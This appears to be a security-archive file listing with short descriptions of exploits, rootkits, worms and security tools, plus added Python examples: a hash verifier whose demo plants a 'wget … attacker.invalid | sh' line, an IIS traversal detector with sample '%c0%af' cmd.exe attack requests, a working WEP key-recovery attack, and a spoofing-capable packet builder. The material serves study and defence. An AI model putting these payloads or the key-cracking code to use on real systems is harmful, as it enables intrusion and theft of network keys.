Research on the recent OpenBSD select() bug and its possible exploitation. Includes a local denial of service exploit which was tested on OpenBSD v2.6 - 3.1.
a139e465d5432bfb22c8cb02fcaad81f3ba8d7d7f42d2f31a3ad875ca2065362
Fuck'it RootKit. Uses an ssh daemon which listens on port 1984 by default.
ecda413afe774928a09b55ef7af38e67fd7c7f3fb6daa26f1ef757be52df5313
This is a modified version of the Slapper worm and was recovered from a compromised machine. Modifications to the worm let it mail system information, such as the IP address and processor type, to a Yahoo! email address. No other changes were made.
d871493127f042e44746b0d6678a391feb86eed4b2f5224af756399b4ec22188
This tool can be used to replace netstat in order to hide network sockets on a system.
e3829d7b3011d4e902f75347e995a7775ff3c56340d79178d3b5588617fa209f
Winfingerprint v0.5.3: Advanced remote Windows OS detection. Current features: determine OS using SMB queries (PDC (Primary Domain Controller), BDC (Backup Domain Controller), NT member server, NT workstation, SQL Server, Novell NetWare server, Windows for Workgroups, Windows 9x); enumerate servers; enumerate shares, including administrative ($) shares; enumerate global groups; enumerate users; display active services; scan Network Neighborhood; establish a NULL IPC$ session with a host; query the registry (currently determines service pack level and applied hotfixes).
90bf1fe4fd53df1e0615f1d129c9fa8b6f4e56ee982f6ef8272e6cff575937b4
Kismet is an 802.11b wireless network sniffer. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X. Features: multiple packet capture sources, runtime network sorting by AP MAC address (BSSID), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal- and tcpdump-compatible file logging, AirSnort-compatible "interesting" (cryptographically weak) packet logging, secure SUID behavior, and GPS device and wireless device fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
b8facdc4e3ecabeb7c90224bfda8baf5903f4d6ee52939327bde3f868f18d01f
SPIKE proxy is a web application analysis tool which uses the SPIKE API to help reverse engineer new and unknown network protocols. Provides security analysis features for Web applications, a multi-threaded design, man in the middle SSL proxying, form rewriting, SQL injection detection, handles Connection: keep-alive properly (it is possible to log in to Hotmail with it), and rewrites User-Agent to pretend to be running IE. Requires pyOpenSSL pre 0.5 from the SPIKE Web page. Several working examples are included. Screenshot available here.
08787f66244491fa56d1a647c261268d4044bc34cf9b2299b02a138f29c94598
HashDB is a networked md5 hash comparison tool that allows you to automatically check the hashes of any files you download against a master database stored at www.immunitysec.com. This allows you to download source tarballs without worrying that they've been replaced by trojaned ./configure files.
4a1fc0b4fd64f1f50f53b470729606f6873f9dff312ef2a66c32af02f31e6501
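HashDB compares MD5 digests against a remote database; the same check, run against a digest list you pinned yourself (such as the SHA-256 values listed beside each file on this page), also catches the replaced netstat and ssh binaries that the rootkits above install. The following is an added example, not HashDB's code: it verifies a directory against a manifest in md5sum/sha256sum format, reports mismatched and missing files, and runs a constructed scenario in a temporary directory in which a trojaned ./configure has been swapped in. The file names, contents and the attacker URL are constructed for the demo. Note that MD5 is no longer collision resistant, so a manifest should carry SHA-256 where the choice is yours.

```python
"""Added example (not HashDB code): verify downloaded files, or installed
binaries, against a pinned manifest of digests."""
import hashlib
import hmac
import os
import tempfile

ALGO_BY_HEXLEN = {32: "md5", 40: "sha1", 64: "sha256"}   # infer algorithm from hex length


def digest_bytes(data, algo="sha256"):
    return hashlib.new(algo, data).hexdigest()


def file_digest(path, algo="sha256", chunk=1 << 16):
    """Stream the file so large tarballs do not have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text):
    """'<hexdigest>  <name>' per line, as md5sum/sha256sum write it ('*name' = binary mode)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, name = line.split(None, 1)
        entries[name.lstrip("*")] = digest.lower()
    return entries


def verify_tree(manifest, directory):
    """Return {name: 'ok' | 'MISMATCH' | 'MISSING' | 'BAD_DIGEST'} for every manifest entry."""
    results = {}
    for name, expected in manifest.items():
        algo = ALGO_BY_HEXLEN.get(len(expected))
        if algo is None:
            results[name] = "BAD_DIGEST"
            continue
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "MISSING"
            continue
        actual = file_digest(path, algo)
        # compare_digest is constant-time; not needed for a local check, but a cheap habit.
        results[name] = "ok" if hmac.compare_digest(actual, expected) else "MISMATCH"
    return results


def demo():
    """Constructed scenario: pin three files, then a trojaned ./configure is
    swapped in and one listed file disappears."""
    d = tempfile.mkdtemp()
    files = {"tool-1.0.tar.gz": b"constructed tarball bytes",
             "configure": b"#!/bin/sh\necho checking for gcc\n",
             "README": b"constructed readme"}
    for name, data in files.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    manifest = parse_manifest("\n".join(
        f"{file_digest(os.path.join(d, n))}  {n}" for n in files))
    # tampering after the manifest was pinned (hypothetical attacker host)
    with open(os.path.join(d, "configure"), "wb") as f:
        f.write(b"#!/bin/sh\nwget -qO- http://attacker.invalid/x | sh\n")
    os.remove(os.path.join(d, "README"))
    return verify_tree(manifest, d)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:9} {name}")
```

The manifest must come from somewhere the attacker who replaced the tarball could not also edit (a signed release announcement, or a copy pinned before the download), otherwise the check only proves the file matches its own description.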
Genshell is a fully generic win32 shellcode generator. It compiles on both Linux and Windows. Shellcode is also polymorphic (you can specify xor-byte value). A complete article with source code is included.
b90364b48c70c4622aa95c35d6ba27db5dd4ecbc4f71055d49fad2a4fef26089
Apple security advisory APPLE-SA-2002-09-19 - Apple QuickTime ActiveX v5.0.2 has a buffer overrun condition that can result in execution of arbitrary code. To exploit this vulnerability an attacker would need to get the target to open a malicious HTML file as an attachment to an email message, as a file on the local or network file system, or as a file served via HTTP.
5907e5ca8b939567f596c5abdbc0ead1070c8160b0c2423fbea33fdb62a333be
This exploit uses a symbolic link vulnerability in the Borland Interbase gds_lock_mgr binary to overwrite /etc/xinetd.d/xinetdbd with code that spawns a root shell on port 666 TCP.
d7d156c479c021809f9a0057514db6f1459ab7f03ab76f348bc1c94b1dfed0a8
Gentoo Linux security advisory - A vulnerability found in default Apache Tomcat 4.x installation can be used to remotely disclose the source of served JSP files.
44918fb3fe44c0391cb282db4a9797872dc7635f9b5b0467868f2917103a9e8a
Microsoft Security Advisory MS02-053 - Serious vulnerabilities have been discovered in the SmartHTML Interpreter (shtml.dll) of Microsoft FrontPage Server Extensions 2000 and 2002. On FrontPage Server Extensions 2002 the flaw allows a remote attacker to run code of their choice; on FrontPage Server Extensions 2000 the attacker can consume most or all available CPU until the service is restarted.
e336209cb8e7287fcc28062f2faba13182a7f5785256bb71bd5aa1e1aeb6918f
This exploit abuses the KEY_ARG buffer overflow that exists in SSL-enabled Apache web servers that are compiled with OpenSSL versions prior to 0.9.6e. The apache-ssl-bug.c exploit is based on the Slapper worm (bugtraq.c), which is based on an early version of the apache-open-ssl exploit.
436090b56a7078c33d435bf10253452623305a3c47e6e5c7f13c05a10118fd8d
This tool can be used to scan IIS servers for the unicode directory traversal vulnerability.
d68555136e1216e01f665bb28f94c34d9fa82ebd4c0629f79f500a373361d1c4
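The IIS unicode traversal bug came from checking the request path for ".." before UTF-8 decoding, so an overlong encoding of "/" (%c0%af) or "\" (%c1%9c) passed the check and then decoded to a path separator. The following is an added example, not the scanner's code: a deliberately lenient UTF-8 decoder that accepts overlong sequences the way the vulnerable server did, a function that reports how many such sequences a request path contains and whether the normalized path leaves the virtual root, and a check over a few constructed log lines. The log lines, client addresses and the /scripts virtual root are constructed for the demo.

```python
"""Added example: detect overlong UTF-8 path separators in request URIs and
decide whether the path escapes the virtual root (IIS unicode traversal)."""
import posixpath
from urllib.parse import unquote_to_bytes

REPL = "\ufffd"


def lenient_utf8(raw):
    """UTF-8 decoder that accepts overlong forms (%c0%af -> '/', %c1%9c -> '\\').
    Returns (text, number_of_overlong_sequences); a strict decoder rejects each of them."""
    out, i, overlong = [], 0, 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b < 0xE0:
            n, cp, minimum = 1, b & 0x1F, 0x80
        elif 0xE0 <= b < 0xF0:
            n, cp, minimum = 2, b & 0x0F, 0x800
        elif 0xF0 <= b < 0xF8:
            n, cp, minimum = 3, b & 0x07, 0x10000
        else:
            out.append(REPL)
            i += 1
            continue
        cont = raw[i + 1:i + 1 + n]
        if len(cont) != n or any(c & 0xC0 != 0x80 for c in cont):
            out.append(REPL)
            i += 1
            continue
        for c in cont:
            cp = (cp << 6) | (c & 0x3F)
        if cp < minimum:
            overlong += 1          # shortest-form rule violated
        out.append(chr(cp) if cp < 0x110000 else REPL)
        i += 1 + n
    return "".join(out), overlong


def analyze_request_path(request_uri, vroot="/scripts"):
    """Percent-decode, decode leniently, normalize, and test against the vroot."""
    raw = unquote_to_bytes(request_uri.split("?", 1)[0])
    try:
        raw.decode("utf-8")
        strict_ok = True
    except UnicodeDecodeError:
        strict_ok = False
    text, overlong = lenient_utf8(raw)
    normalized = posixpath.normpath(text.replace("\\", "/"))
    escapes = not (normalized == vroot or normalized.startswith(vroot + "/"))
    return {"decoded": text, "normalized": normalized, "overlong": overlong,
            "strict_utf8": strict_ok, "escapes_vroot": escapes}


# Constructed log lines (not from any real server) to run the check over.
SAMPLE_LOG = [
    '10.1.1.5 - - [19/Sep/2002:10:01:02 +0000] "GET /scripts/foo.asp HTTP/1.0" 200 512',
    '10.1.1.9 - - [19/Sep/2002:10:01:07 +0000] "GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1893',
    '10.1.1.9 - - [19/Sep/2002:10:01:09 +0000] "GET /scripts/..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1893',
]


def flag_log(lines):
    """Return the request paths that contain overlong sequences or leave the vroot."""
    hits = []
    for line in lines:
        path = line.split('"', 2)[1].split()[1]
        r = analyze_request_path(path)
        if r["overlong"] or r["escapes_vroot"]:
            hits.append(path)
    return hits


if __name__ == "__main__":
    for path in flag_log(SAMPLE_LOG):
        print("traversal attempt:", path, analyze_request_path(path)["normalized"])
```

The strict_utf8 field shows the fix: a decoder that enforces shortest-form UTF-8 raises on %c0%af, so the request never reaches the path check with a hidden separator.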
How to unlock a Samsung T300 cellphone
95e3fe277638e94a8ff970e63471d9ea5628adfcf47a6652752477cf74c79994
AirSnort is a tool for wireless LANs which recovers encryption keys by passively monitoring transmissions, computing the encryption key once enough packets have been gathered. Works on both 40- and 128-bit WEP. Many weaknesses in the 802.11 WEP protocol are discussed here. Once enough packets have been gathered, AirSnort can recover the encryption key in under a second. Tested on Linux kernel v2.4.
02648ab47da49b596792193fe7e0d3a838aeee6fa0dcd41260a727aa7dad7044
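Kismet's "interesting" packet logging above and AirSnort's key recovery both rest on the same Fluhrer-Mantin-Shamir observation: WEP seeds RC4 with IV || key, the IV is sent in the clear, and every data frame starts with the LLC/SNAP header, so the first keystream byte is known; for IVs of the form (B+3, 255, x) that byte leaks key byte B about 5% of the time, and majority voting over enough such frames recovers the key one byte at a time. The following is an added simulation of that attack, not AirSnort or Kismet code: it generates its own constructed 40-bit key and a constructed capture containing every classic weak IV, classifies IVs the way AirSnort's "interesting" filter does, votes with the FMS formula, and confirms the candidate key against a frame's known SNAP header. A real capture needs millions of frames to collect this many weak IVs.

```python
"""Added example: FMS weak-IV attack on WEP, simulated end to end.
The key and frames are constructed for the demo."""

# Every WEP data frame starts with this LLC/SNAP header, so the first
# plaintext byte (0xAA) is known and the first keystream byte leaks.
SNAP_HEADER = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00])
SECRET = bytes([0x1F, 0x2E, 0x3D, 0x4C, 0x5B])   # constructed 40-bit WEP key


def rc4_ksa(key):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, plaintext):
    """WEP seeds RC4 with IV || secret; the 3-byte IV travels in the clear."""
    ks = rc4_keystream(iv + secret, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


def weak_iv_index(iv, keylen):
    """AirSnort's 'interesting' test: IV (B+3, 255, x) attacks secret byte B."""
    if iv[1] == 0xFF and 3 <= iv[0] < 3 + keylen:
        return iv[0] - 3
    return None


def fms_vote(iv, first_ct_byte, known):
    """Run the first B+3 KSA steps with the known key prefix; if the IV is
    'resolved', return the FMS guess for secret byte B = len(known)."""
    B = len(known)
    key = list(iv) + list(known)
    S = list(range(256))
    j = 0
    for i in range(B + 3):
        j = (j + S[i] + key[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if (S[1] + S[S[1]]) & 0xFF != B + 3:
        return None
    out = first_ct_byte ^ SNAP_HEADER[0]            # first keystream byte
    return (S.index(out) - j - S[B + 3]) & 0xFF     # K[B+3] = S^-1[out] - j - S[B+3]


def recover_key(packets, keylen, branch=3):
    """Depth-first majority vote with small branching; a full candidate is
    confirmed against the known SNAP header of packets[0]."""
    verify_iv, verify_ct = packets[0]

    def search(known):
        if len(known) == keylen:
            cand = bytes(known)
            return cand if wep_encrypt(cand, verify_iv, SNAP_HEADER) == verify_ct[:8] else None
        votes = [0] * 256
        for iv, ct in packets:
            if weak_iv_index(iv, keylen) == len(known):
                g = fms_vote(iv, ct[0], known)
                if g is not None:
                    votes[g] += 1
        for cand in sorted(range(256), key=lambda b: -votes[b])[:branch]:
            found = search(known + [cand])
            if found:
                return found
        return None

    return search([])


def build_capture(secret):
    """Constructed capture: one ordinary frame plus all 256 classic weak IVs
    for each secret byte."""
    body = SNAP_HEADER + b"constructed payload"
    plain_iv = bytes([0x12, 0x34, 0x56])
    packets = [(plain_iv, wep_encrypt(secret, plain_iv, body))]
    for B in range(len(secret)):
        for x in range(256):
            iv = bytes([B + 3, 0xFF, x])
            packets.append((iv, wep_encrypt(secret, iv, body)))
    return packets


if __name__ == "__main__":
    print("recovered key:", recover_key(build_capture(SECRET), len(SECRET)).hex())
```

Kismet only logs frames for which weak_iv_index is not None; AirSnort additionally runs the vote. The 5% figure is why the tools need so much traffic: each weak IV gives the right byte only when the rest of the key schedule leaves three S-box positions alone.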
A vulnerability found in default Apache Tomcat 4.x installation can be used to remotely disclose the source of served JSP files. The Tomcat developers fixed this issue in the Tomcat versions 4.0.5 and 4.1.12, which are available here.
2fef92ed7d59d75004c3b7399e643001f93de8ce9846efd4fb65db9ad40f1db1
WinME/XP UPNP denial of service exploit.
dd4090e55c9cd11ffd0a2b06d91b810031268e8bfab0b2aaefc0812502458aef
Voices is a *nix program that hides files in mp3's.
fc0629ea31bd0a4ceb7516abc767ab86a6065df9e8dfee324d664be4247672f0
Vbulletin/calender.php remote command execution exploit.
696c47bb743d4c61635d2b53c61441cce1ff71882f95ce0d1f8c84b21ee7c0c4
Shellcode-v1.0.zip is a generic win32 shellcode generator based mainly on kungfoo. Shellcode can be generated with the help of a GUI. Source and executable included.
7ceadbc837c0a293c10e87c625f4338c9ca2fa138a5049d58d67ace148db452d
Apache v2.0.42 - Apache is the most popular webserver on the Internet, and ranks well in terms of security, functionality, efficiency, and speed. Changelog available here.
67222ed486ef13b54ce49f1d08ef8804fdd9c1e23d4d9ad8627f066335e7b93b
Gspoof is a GTK+ program written in C which makes building and sending TCP packets, with or without a data payload, easy and accurate. TCP/IP fields and the Ethernet header can be modified.
a88d6431a66a7fb6a6ac88abf80c2b92daaac376cb378ea57a11fce08d0db8d9
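The "accurate" part of a packet builder like Gspoof is mostly the checksums: the IPv4 header checksum covers only the header, while the TCP checksum covers a pseudo-header (addresses, protocol, segment length) plus the whole segment, and a crafted packet with a wrong TCP checksum is silently dropped by the receiving stack. The following is an added example, not Gspoof's code: a minimal IPv4+TCP builder with both checksums, a verifier that checks a segment the way a receiver does, a parser, and a raw-socket sender. The addresses and ports are constructed; sending needs root or CAP_NET_RAW and is only done when the script is run directly.

```python
"""Added example: build IPv4/TCP packets with correct checksums (not Gspoof code)."""
import socket
import struct

TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words, zero-padded to even length."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src, dst, payload_len, proto=socket.IPPROTO_TCP, ttl=64, ident=0x1234):
    """20-byte IPv4 header, DF set; checksum covers the header only."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident, 0x4000,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def _pseudo_header(src, dst, tcp_len):
    return struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                       0, socket.IPPROTO_TCP, tcp_len)


def build_tcp(src, dst, sport, dport, seq, ack, flags, window=8192, payload=b""):
    """20-byte TCP header plus payload; checksum covers pseudo-header + header + payload."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    csum = checksum(_pseudo_header(src, dst, len(hdr) + len(payload)) + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def tcp_checksum_ok(src, dst, segment):
    """Receiver-side check: summing with the stored checksum included yields 0."""
    return checksum(_pseudo_header(src, dst, len(segment)) + segment) == 0


def parse_tcp(segment):
    sport, dport, seq, ack, off, flags, window, csum, urg = struct.unpack("!HHIIBBHHH", segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "data_offset": off >> 4, "flags": flags, "window": window, "checksum": csum}


def build_packet(src, dst, sport, dport, seq=0, ack=0, flags=TCP_SYN, payload=b""):
    tcp = build_tcp(src, dst, sport, dport, seq, ack, flags, payload=payload)
    return build_ipv4(src, dst, len(tcp)) + tcp


def send_packet(packet, dst):
    """Raw send; IPPROTO_RAW implies IP_HDRINCL, so our IPv4 header is used as-is."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(packet, (dst, 0))


if __name__ == "__main__":
    pkt = build_packet("10.0.0.1", "10.0.0.2", 40000, 80, seq=1, flags=TCP_SYN)
    print(pkt.hex(), parse_tcp(pkt[20:]))
    # send_packet(pkt, "10.0.0.2")   # requires root / CAP_NET_RAW
```

Spoofing the source address is exactly what makes the pseudo-header matter: the checksum must be computed with the forged source, not the sending host's real one, or the target's stack discards the segment before any application sees it.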
The Balaur Rootkit v2.0 is a rootkit for Red Hat 6.1 which is a descendant of lrk5. Contains an ssh backdoor, login backdoor, cron backdoor, adore, top, syslogd, and more. Patches common vulnerabilities to keep out other attackers.
96dd1e43908212e0dc4ef397abb29aaff477566103061db23da2fb10ca26af26